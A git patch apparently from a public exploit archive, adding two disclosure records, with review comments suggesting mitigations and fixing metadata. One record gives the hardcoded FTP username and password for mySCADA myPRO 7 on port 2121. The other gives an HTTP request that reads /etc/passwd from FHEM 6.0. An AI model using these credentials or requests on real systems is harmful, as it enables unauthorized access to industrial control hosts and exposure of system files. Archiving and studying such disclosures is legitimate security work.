From c22ad85b5703c393f4e6ad1688f01a054dd9e230 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 26 Jun 2020 05:01:58 +0000
Subject: [PATCH] DB: 2020-06-26

2 changes to exploits/shellcodes
mySCADA myPRO 7 - Hardcoded Credentials
FHEM 6.0 - Local File Inclusion
---
 exploits/hardware/remote/48620.txt | 18 ++++++++++++++++++
 exploits/php/webapps/48621.txt | 26 ++++++++++++++++++++++++++
 files_exploits.csv | 2 ++
 3 files changed, 46 insertions(+)
 create mode 100644 exploits/hardware/remote/48620.txt
 create mode 100644 exploits/php/webapps/48621.txt
diff --git a/exploits/hardware/remote/48620.txt b/exploits/hardware/remote/48620.txt
new file mode 100644
index 000000000..d2867f4a0
--- /dev/null
+++ b/exploits/hardware/remote/48620.txt
@@ -0,0 +1,18 @@
+# Exploit Title: mySCADA myPRO v7 Hardcoded Credentials
+# Date: 2018-07-02
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: http://myscada.org
+# Software Link: https://www.myscada.org/mypro/
+# Version: v7.0.45
+# Tested on: Windows/Linux
+# CVE-2018-11311
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11311
+# https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password
+
+# PoC
+
+ftp [IP] 2121
+
+username: myscada
+
+password: Vikuk63
\ No newline at end of file
diff --git a/exploits/php/webapps/48621.txt b/exploits/php/webapps/48621.txt
new file mode 100644
index 000000000..bbc00ece2
--- /dev/null
+++ b/exploits/php/webapps/48621.txt
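Review bot: The new 48620.txt record names only the affected build (`# Version: v7.0.45`) and gives no fixed release or mitigation, so a reader cannot tell from it whether a given installation is still exposed. Consider adding a header line such as `# Fixed in: <fixed version, not stated on this page>` and a short defensive line such as `# Mitigation: restrict access to the FTP service on port 2121 and audit logins for the built-in account`. The in-file title (`mySCADA myPRO v7 Hardcoded Credentials`) also differs from the index description (`mySCADA myPRO 7 - Hardcoded Credentials`); aligning the two keeps searches consistent.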
@@ -0,0 +1,26 @@
+# Exploit Title: FHEM 6.0 - Local File Inclusion
+# Date: 2020-02-10
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://fhem.de/
+# Software Link: https://fhem.de/#Download
+# Version: v6.0
+# Tested on: Windows
+# Link: https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability
+
+# PoC
+
+To exploit vulnerability, someone could use 'http://
+[HOST]/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text'
+request
+to get some informations from the target by changing "file" parameter.
+
+GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0)
+Gecko/20100101 Firefox/74.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 87baaa104..cc9412bd6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
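Review bot: `# Tested on: Windows` does not match the PoC in 48621.txt, which requests `file=%2fetc%2fpasswd`, a path that exists only on Unix-like hosts; the header should name the platform the request was actually verified on. What the text describes is an unvalidated `file` parameter on `FileLog_logWrapper` returning file contents, which reads more like an arbitrary file read / path traversal than a file inclusion, so the title may be worth qualifying. The record also carries no CVE, fixed version or mitigation; a line such as `# Mitigation: restrict access to the FHEM web interface and review logs for FileLog_logWrapper requests whose file value is an absolute path` would give defenders something to act on.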
@@ -18201,6 +18201,7 @@ id,file,description,date,author,type,platform,port
 48540,exploits/linux/remote/48540.py,"vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-02,aaronsvk,remote,linux,
 48569,exploits/multiple/remote/48569.py,"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)",2020-06-10,hyp3rlinx,remote,multiple,
 48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple,
+48620,exploits/hardware/remote/48620.txt,"mySCADA myPRO 7 - Hardcoded Credentials",2020-06-25,"Emre ÖVÜNÇ",remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42876,3 +42877,4 @@ id,file,description,date,author,type,platform,port
 48615,exploits/php/webapps/48615.txt,"Responsive Online Blog 1.0 - 'id' SQL Injection",2020-06-23,"Eren Şimşek",webapps,php,
 48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,
 48619,exploits/multiple/webapps/48619.txt,"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting",2020-06-24,"William Summerhill",webapps,multiple,
+48621,exploits/php/webapps/48621.txt,"FHEM 6.0 - Local File Inclusion",2020-06-25,"Emre ÖVÜNÇ",webapps,php,
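Review bot: Both added rows look misclassified in the `platform` column, which affects anyone filtering the index by platform. Row 48620 is filed as `hardware` although its own header says `Tested on: Windows/Linux` and links a software download, and row 48621 (second hunk) is filed as `php` although FHEM is, as far as I know, a Perl server; `multiple`, already used by row 48619, would presumably fit both better, with the file paths moved to match. Row 48620 also leaves `port` empty while its PoC targets 2121; the neighbouring rows leave it empty as well, so this may simply be the index convention.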